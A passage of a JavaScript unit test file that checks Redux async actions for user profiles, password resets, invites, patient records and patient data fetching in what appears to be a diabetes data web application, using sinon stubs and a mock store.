'UPDATE_USER_SUCCESS', payload: { userId: loggedInUserId, updatedUser: updatedUser } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateClinicianProfile(api, formValues)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; expect(trackMetric.calledWith('Updated Account')).to.be.true; }); context('new clinic workflow enabled and user has pending clinic invites', () => { before(() => { async.__Rewire__('config', { CLINICS_ENABLED: true, }); }); after(() => { async.__ResetDependency__('config'); }); it('should trigger UPDATE_USER_SUCCESS and it should call updateClinicianProfile once for a successful request and route user to workspaces view', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 }, }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, password: '<PASSWORD>' }; let updatedUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe', password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, null, updatedUser) } }; let initialStateForTest = _.merge( {}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId, pendingReceivedClinicianInvites: [{ inviteId: 'invite123' }], } ); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_SUCCESS', payload: { userId: loggedInUserId, updatedUser: updatedUser } }, { type:
'@@router/CALL_HISTORY_METHOD', payload: { args: [ '/workspaces' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateClinicianProfile(api, formValues)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; expect(trackMetric.calledWith('Updated Account')).to.be.true; }); }); it('should trigger UPDATE_USER_FAILURE and it should call updateClinicianProfile once for a failed request', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 } }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_UPDATING_USER); err.status = 500; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateClinicianProfile(api, formValues)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_USER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; }); });
describe('requestPasswordReset', () => { it('should trigger REQUEST_PASSWORD_RESET_SUCCESS and it should call requestPasswordReset once for a successful request', () => { const email = '<EMAIL>'; let api = { user: { requestPasswordReset: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'REQUEST_PASSWORD_RESET_REQUEST' }, { type: 'REQUEST_PASSWORD_RESET_SUCCESS' } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.requestPasswordReset(api, email)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.requestPasswordReset.calledWith(email)).to.be.true; }); it('should trigger REQUEST_PASSWORD_RESET_FAILURE and it should call requestPasswordReset once for a failed request', () => { const email = '<EMAIL>'; let api = { user: { requestPasswordReset: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_REQUESTING_PASSWORD_RESET); err.status = 500; let expectedActions = [ { type: 'REQUEST_PASSWORD_RESET_REQUEST' }, { type: 'REQUEST_PASSWORD_RESET_FAILURE', error: err, meta: {apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.requestPasswordReset(api, email)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REQUESTING_PASSWORD_RESET }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.requestPasswordReset.calledWith(email)).to.be.true; }); }); describe('confirmPasswordReset', () => { it('should trigger CONFIRM_PASSWORD_RESET_SUCCESS and it should call confirmPasswordReset once for a successful requestPasswordReset', () => { const payload = {}; let api = { user: { confirmPasswordReset: sinon.stub().callsArgWith(1, null) } }; 
    let expectedActions = [
      { type: 'CONFIRM_PASSWORD_RESET_REQUEST' },
      { type: 'CONFIRM_PASSWORD_RESET_SUCCESS' }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.confirmPasswordReset(api, payload));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.confirmPasswordReset.calledWith(payload)).to.be.true;
  });

  it('should trigger CONFIRM_PASSWORD_RESET_FAILURE and it should call confirmPasswordReset once for a failed requestPasswordReset', () => {
    const payload = {};
    let api = {
      user: {
        confirmPasswordReset: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'})
      }
    };
    let err = new Error(ErrorMessages.ERR_CONFIRMING_PASSWORD_RESET);
    err.status = 500;
    let expectedActions = [
      { type: 'CONFIRM_PASSWORD_RESET_REQUEST' },
      { type: 'CONFIRM_PASSWORD_RESET_FAILURE', error: err, meta: {apiError: {status: 500, body: 'Error!'}} }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.confirmPasswordReset(api, payload));
    const actions = store.getActions();
    // Swap the real Error into the expectation after checking its message (eql can't match it).
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_PASSWORD_RESET });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.user.confirmPasswordReset.calledWith(payload)).to.be.true;
  });
});

// logError thunk: api.errors.log is stubbed with the callback at arg index 3
// (after error, message, props).
describe('logError', () => {
  it('should trigger LOG_ERROR_SUCCESS and it should call error once for a successful request', () => {
    let error = 'Error';
    let message = 'Some random detailed error message!';
    let props = { stacktrace: true };
    let api = {
      errors: {
        log: sinon.stub().callsArgWith(3, null)
      }
    };
    let expectedActions = [
      { type: 'LOG_ERROR_REQUEST' },
      { type: 'LOG_ERROR_SUCCESS' }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.logError(api, error, message, props));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.errors.log.withArgs(error, message, props).callCount).to.equal(1);
  });
});

// fetchUser thunk: api.user.get is stubbed with the callback at arg index 0.
// Covers success (emailVerified true), a failure when the email is not verified,
// and HTTP 401/500 failures.
describe('fetchUser', () => {
  it('should trigger FETCH_USER_SUCCESS and it should call user.get once for a successful request', () => {
    let user = { emailVerified: true, username: '<EMAIL>', id: 306, name: '<NAME>' };
    let api = {
      user: {
        get: sinon.stub().callsArgWith(0, null, user)
      }
    };
    let expectedActions = [
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user : user } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchUser(api));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.get.callCount).to.equal(1);
  });

  it('should trigger FETCH_USER_FAILURE and it should call error once for a request for user that has not verified email', () => {
    // The API call itself succeeds (err is null) but the returned user has
    // emailVerified: false, so the thunk raises ERR_EMAIL_NOT_VERIFIED with no apiError.
    let user = { emailVerified: false, username: '<EMAIL>', id: 306, name: '<NAME>' };
    let api = {
      user: {
        get: sinon.stub().callsArgWith(0, null, user)
      }
    };
    let expectedActions = [
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_FAILURE', error: new Error(ErrorMessages.ERR_EMAIL_NOT_VERIFIED), meta: { apiError: null } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchUser(api));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_EMAIL_NOT_VERIFIED });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.user.get.callCount).to.equal(1);
  });

  it('[401] should trigger FETCH_USER_FAILURE and it should call error once for a failed request', () => {
    let user = { id: 306, name: '<NAME>' };
    let api = {
      user: {
        get: sinon.stub().callsArgWith(0, {
          status: 401 }, null)
      }
    };
    // A 401 here is expected to produce a FAILURE action with a null error
    // (per the expectation below) rather than a constructed Error.
    let expectedActions = [
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_FAILURE', error: null, meta: { apiError: { status: 401 } } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchUser(api));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.get.callCount).to.equal(1);
  });

  it('[500] should trigger FETCH_USER_FAILURE and it should call error once for a failed request', () => {
    let user = { id: 306, name: '<NAME>' };
    let api = {
      user: {
        get: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null)
      }
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_USER);
    err.status = 500;
    let expectedActions = [
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchUser(api));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_USER });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.user.get.callCount).to.equal(1);
  });
});

// fetchPendingSentInvites thunk: api.invitation.getSent stubbed, callback at arg index 0.
describe('fetchPendingSentInvites', () => {
  it('should trigger FETCH_PENDING_SENT_INVITES_SUCCESS and it should call error once for a successful request', () => {
    let pendingSentInvites = [ 1, 555, 78191 ];
    let api = {
      invitation: {
        getSent: sinon.stub().callsArgWith(0, null, pendingSentInvites)
      }
    };
    let expectedActions = [
      { type: 'FETCH_PENDING_SENT_INVITES_REQUEST' },
      { type: 'FETCH_PENDING_SENT_INVITES_SUCCESS', payload: { pendingSentInvites : pendingSentInvites } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchPendingSentInvites(api));
    const
    actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.getSent.callCount).to.equal(1);
  });

  it('should trigger FETCH_PENDING_SENT_INVITES_FAILURE and it should call error once for a failed request', () => {
    let pendingSentInvites = [ 1, 555, 78191 ];
    let api = {
      invitation: {
        getSent: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null)
      }
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_PENDING_SENT_INVITES);
    err.status = 500;
    let expectedActions = [
      { type: 'FETCH_PENDING_SENT_INVITES_REQUEST' },
      { type: 'FETCH_PENDING_SENT_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchPendingSentInvites(api));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PENDING_SENT_INVITES });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.getSent.callCount).to.equal(1);
  });
});

// fetchPendingReceivedInvites thunk: api.invitation.getReceived stubbed, callback at arg index 0.
describe('fetchPendingReceivedInvites', () => {
  it('should trigger FETCH_PENDING_RECEIVED_INVITES_SUCCESS and it should call error once for a successful request', () => {
    let pendingReceivedInvites = [ 1, 555, 78191 ];
    let api = {
      invitation: {
        getReceived: sinon.stub().callsArgWith(0, null, pendingReceivedInvites)
      }
    };
    let expectedActions = [
      { type: 'FETCH_PENDING_RECEIVED_INVITES_REQUEST' },
      { type: 'FETCH_PENDING_RECEIVED_INVITES_SUCCESS', payload: { pendingReceivedInvites : pendingReceivedInvites } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchPendingReceivedInvites(api));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.getReceived.callCount).to.equal(1);
  });

  it('should trigger FETCH_PENDING_RECEIVED_INVITES_FAILURE and it should call error once for a failed request', () => {
    let pendingReceivedInvites = [ 1, 555, 78191 ];
    let api = {
      invitation: {
        getReceived: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null)
      }
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_PENDING_RECEIVED_INVITES);
    err.status = 500;
    let expectedActions = [
      { type: 'FETCH_PENDING_RECEIVED_INVITES_REQUEST' },
      { type: 'FETCH_PENDING_RECEIVED_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchPendingReceivedInvites(api));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PENDING_RECEIVED_INVITES });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.getReceived.callCount).to.equal(1);
  });
});

// fetchPatient thunk: api.patient.get stubbed with callback at arg index 1.
// Also exercises the allUsersMap cache ('<id>_cacheUntil' entries) short-circuit.
describe('fetchPatient', () => {
  it('should trigger FETCH_PATIENT_SUCCESS and it should call error once for a successful request', () => {
    let patient = { id: 58686, name: '<NAME>', age: 65 };
    let api = {
      patient: {
        get: sinon.stub().callsArgWith(1, null, patient)
      }
    };
    let expectedActions = [
      { type: 'FETCH_PATIENT_REQUEST' },
      { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchPatient(api, 58686));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.patient.get.withArgs(58686).callCount).to.equal(1);
  });

  it('should trigger FETCH_PATIENT_SUCCESS without fetching patient if complete patient record is in cache', () => {
    let patient = { id: 58686, name: '<NAME>', age: 65, settings: {} };
    let api = {
      patient: {
        get: sinon.stub().callsArgWith(1, null, patient)
      }
    };
    let
    expectedActions = [
      // No REQUEST action: the cached record (with settings present and an
      // unexpired '58686_cacheUntil') is served without hitting the API.
      { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: {
      ...initialState,
      allUsersMap: {
        58686: patient,
        '58686_cacheUntil': 9999999999999,
      }
    } });
    store.dispatch(async.fetchPatient(api, 58686));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.patient.get.callCount).to.equal(0);
  });

  it('should skip the cache and fetch patient if settings are missing in cached patient record', () => {
    let patient = { id: 58686, name: '<NAME>', age: 65, settings: undefined };
    let api = {
      patient: {
        get: sinon.stub().callsArgWith(1, null, patient)
      }
    };
    let expectedActions = [
      { type: 'FETCH_PATIENT_REQUEST' },
      { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: {
      ...initialState,
      allUsersMap: {
        58686: patient,
        '58686_cacheUntil': 9999999999999,
      }
    } });
    store.dispatch(async.fetchPatient(api, 58686));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.patient.get.withArgs(58686).callCount).to.equal(1);
  });

  it('[500] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => {
    let patient = { id: 58686, name: '<NAME>', age: 65 };
    let api = {
      patient: {
        get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null)
      }
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT);
    err.status = 500;
    let expectedActions = [
      { type: 'FETCH_PATIENT_REQUEST' },
      { type: 'FETCH_PATIENT_FAILURE', error: err, payload: {link: null}, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchPatient(api, 58686));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.patient.get.withArgs(58686).callCount).to.equal(1);
  });

  it('[404] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => {
    // 404 while fetching one's OWN record (loggedInUserId matches the fetched id)
    // maps to ERR_YOUR_ACCOUNT_NOT_CONFIGURED plus a setup link in the payload.
    // NOTE(review): Object.assign(initialState, ...) mutates the shared initialState
    // fixture; consider Object.assign({}, initialState, ...) — confirm no cross-test bleed.
    let patient = { id: 58686, name: '<NAME>', age: 65 };
    let thisInitialState = Object.assign(initialState, {loggedInUserId: 58686});
    let api = {
      patient: {
        get: sinon.stub().callsArgWith(1, {status: 404, body: 'Error!'}, null)
      }
    };
    let err = new Error(ErrorMessages.ERR_YOUR_ACCOUNT_NOT_CONFIGURED);
    err.status = 404;
    let expectedActions = [
      { type: 'FETCH_PATIENT_REQUEST' },
      { type: 'FETCH_PATIENT_FAILURE', error: err, payload: {link: {to: '/patients/new', text: UserMessages.YOUR_ACCOUNT_DATA_SETUP}}, meta: { apiError: {status: 404, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: thisInitialState });
    store.dispatch(async.fetchPatient(api, 58686));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_YOUR_ACCOUNT_NOT_CONFIGURED });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.patient.get.withArgs(58686).callCount).to.equal(1);
  });

  it('[401] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => {
    // 401 while the logged-in user IS the requested patient -> unauthorized message.
    let thisInitialState = Object.assign(initialState, {
      loggedInUserId: 58686,
    });
    let api = {
      patient: {
        get: sinon.stub()
          .callsArgWith(1, { status: 401, body: 'Error!' }, null),
      },
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_UNAUTHORIZED);
    err.status = 401;
    let expectedActions = [
      { type: 'FETCH_PATIENT_REQUEST' },
      {
        type: 'FETCH_PATIENT_FAILURE',
        error: err,
        payload: {
          link: null,
        },
        meta: {
          apiError: {
            status: 401,
            body: 'Error!'
} }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: thisInitialState }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); it('[401 clinician] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => { let thisInitialState = Object.assign(initialState, { loggedInUserId: 58688, }); let api = { patient: { get: sinon.stub() .callsArgWith(1, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_PATIENT_CLINICIAN_UNAUTHORIZED ); err.status = 404; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: { link: null, }, meta: { apiError: { status: 401, body: 'Error!' 
          } }, }, ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: thisInitialState });
    store.dispatch(async.fetchPatient(api, 58686));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({
      message: ErrorMessages.ERR_FETCHING_PATIENT_CLINICIAN_UNAUTHORIZED,
    });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.patient.get.withArgs(58686).callCount).to.equal(1);
  });
});

// fetchAssociatedAccounts thunk: api.user.getAssociatedAccounts stubbed (callback at
// arg index 0); the thunk also forwards (err, result) to the supplied callback.
describe('fetchAssociatedAccounts', () => {
  it('should trigger FETCH_ASSOCIATED_ACCOUNTS_SUCCESS and it should call error once for a successful request', () => {
    const callback = sinon.stub();
    let patients = [ { id: 58686, name: '<NAME>', age: 65 } ]
    let api = {
      user: {
        getAssociatedAccounts: sinon.stub().callsArgWith(0, null, { patients })
      }
    };
    let expectedActions = [
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients : patients } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchAssociatedAccounts(api, callback));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.getAssociatedAccounts.callCount).to.equal(1);
    // assert callback contains payload with no error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, null, { patients: [{ age: 65, id: 58686, name: '<NAME>' }] });
  });

  it('should trigger FETCH_ASSOCIATED_ACCOUNTS_FAILURE and it should call error once for a failed request', () => {
    const callback = sinon.stub();
    const error = {status: 500, body: 'Error!'};
    let patients = [ { id: 58686, name: '<NAME>', age: 65 } ]
    let api = {
      user: {
        // NOTE(review): `body: error` nests the whole error object as the body
        // ({status: 500, body: {status: 500, body: 'Error!'}}); self-consistent
        // with the expectation below, but likely intended body: 'Error!' — confirm.
        getAssociatedAccounts: sinon.stub().callsArgWith(0, {status: 500, body: error}, null)
      }
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS);
    err.status = 500;
    let expectedActions = [
      { type:
        'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_FAILURE', error: err, meta: { apiError: {status: 500, body: error} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchAssociatedAccounts(api, callback));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.user.getAssociatedAccounts.callCount).to.equal(1);
    // assert callback contains the error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, { body: error, status: 500 }, null);
  });
});

// fetchPatientData thunk: larger suite with shared fixtures. The rollbar module is
// rewired to a stub for the whole describe; per-test stubs cover patientData.get,
// team.getNotes, and server.getTime (which reports a fixed serverTime).
describe('fetchPatientData', () => {
  const patientId = 300;
  const serverTime = '2018-02-01T00:00:00.000Z';
  let options;
  let patientData;
  let teamNotes;
  let uploadRecord;
  let api;
  let rollbar;

  before(() => {
    rollbar = {
      info: sinon.stub(),
    };
    async.__Rewire__('rollbar', rollbar);
  });

  beforeEach(() => {
    options = {
      startDate: '2018-01-01T00:00:00.000Z',
      endDate: '2018-01-30T00:00:00.000Z',
      returnData: false,
      useCache: true,
      initial: true,
    };
    patientData = [
      { id: 25, value: 540.4, type: 'smbg', time: '2018-01-01T00:00:00.000Z' },
      { id: 26, value: 30.8, type: 'smbg', time: '2018-01-30T00:00:00.000Z' },
      { id: 27, uploadId: 'upload123', type: 'pumpSettings', time: '2018-05-01T00:00:00.000Z' },
      { type: 'upload', id: 'upload789', uploadId: '_upload789', time: '2018-06-01T00:00:00.000Z' },
    ];
    uploadRecord = [ { type: 'upload', id: 'upload123', uploadId: '_upload123', time: '2018-01-15T00:00:00.000Z'} ];
    teamNotes = [ { id: 28, note: 'foo' } ];
    api = {
      patientData: {
        get: sinon.stub().callsArgWith(2, null, patientData),
      },
      team: {
        getNotes: sinon.stub().callsArgWith(2, null, teamNotes)
      },
      server: {
        getTime: sinon.stub().callsArgWith(0, null, { data: { time: serverTime } })
      }
    };
  });

  afterEach(() => {
    rollbar.info.resetHistory();
  });

  after(() => {
    async.__ResetDependency__('rollbar');
  });

  // When blip.data.cacheUntil is unexpired, the thunk should not re-fetch
  // unless options.useCache is explicitly false.
  context('data is available in cache', () => {
    it('should not trigger FETCH_PATIENT_DATA_REQUEST by default', () => {
      let store = mockStore({ blip: {
        ...initialState,
        data: {
          cacheUntil: 9999999999999,
        },
      } });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions).to.not.deep.include({ type: 'FETCH_PATIENT_DATA_REQUEST' });
    });

    it('should not trigger FETCH_PATIENT_DATA_REQUEST if options.useCache is true', () => {
      let store = mockStore({ blip: {
        ...initialState,
        data: {
          cacheUntil: 9999999999999,
        },
      } });
      store.dispatch(async.fetchPatientData(api, { ...options, useCache: true }, patientId));
      const actions = store.getActions();
      expect(actions).to.not.deep.include({ type: 'FETCH_PATIENT_DATA_REQUEST' });
    });

    it('should still trigger FETCH_PATIENT_DATA_REQUEST if options.useCache is false', () => {
      let store = mockStore({ blip: {
        ...initialState,
        data: {
          cacheUntil: 9999999999999,
        },
      }, router: { location: { pathname: `data/${patientId}` } } });
      store.dispatch(async.fetchPatientData(api, { ...options, useCache: false }, patientId));
      const actions = store.getActions();
      expect(actions).to.deep.include({ type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } });
    });
  });

  // options.initial = true: the thunk first fetches server time, so failures
  // surface after FETCH_SERVER_TIME_REQUEST/SUCCESS.
  context('initial data fetch', () => {
    it('trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to intial patient data call returning error', () => {
      api.patientData = {
        get: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null),
      };
      let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA);
      err.status = 500;
      let expectedActions = [
        { type: 'FETCH_SERVER_TIME_REQUEST'},
        { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } },
        { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
      ];
      _.each(expectedActions, (action) => {
        expect(isTSA(action)).to.be.true;
      });
      let store = mockStore({ blip: initialState });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA });
      expectedActions[2].error = actions[2].error;
      expect(actions).to.eql(expectedActions);
    });

    it('[403] trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to intial patient data call returning error', () => {
      // 403 while the logged-in user IS the patient -> unauthorized message.
      api.patientData = {
        get: sinon.stub().callsArgWith(2, {status: 403, body: 'Error!'}, null),
      };
      let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA_UNAUTHORIZED);
      err.status = 403;
      let expectedActions = [
        { type: 'FETCH_SERVER_TIME_REQUEST' },
        { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } },
        {
          type: 'FETCH_PATIENT_DATA_FAILURE',
          error: err,
          meta: { apiError: { status: 403, body: 'Error!' } },
        },
      ];
      _.each(expectedActions, (action) => {
        expect(isTSA(action)).to.be.true;
      });
      let store = mockStore({
        blip: { ...initialState, ...{ loggedInUserId: patientId } },
      });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA_UNAUTHORIZED });
      expectedActions[2].error = actions[2].error;
      expect(actions).to.eql(expectedActions);
    });

    it('[403 clinician] trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to intial patient data call returning error', () => {
      // 403 while logged in as someone else -> clinician-specific message.
      api.patientData = {
        get: sinon.stub().callsArgWith(2, {status: 403, body: 'Error!'}, null),
      };
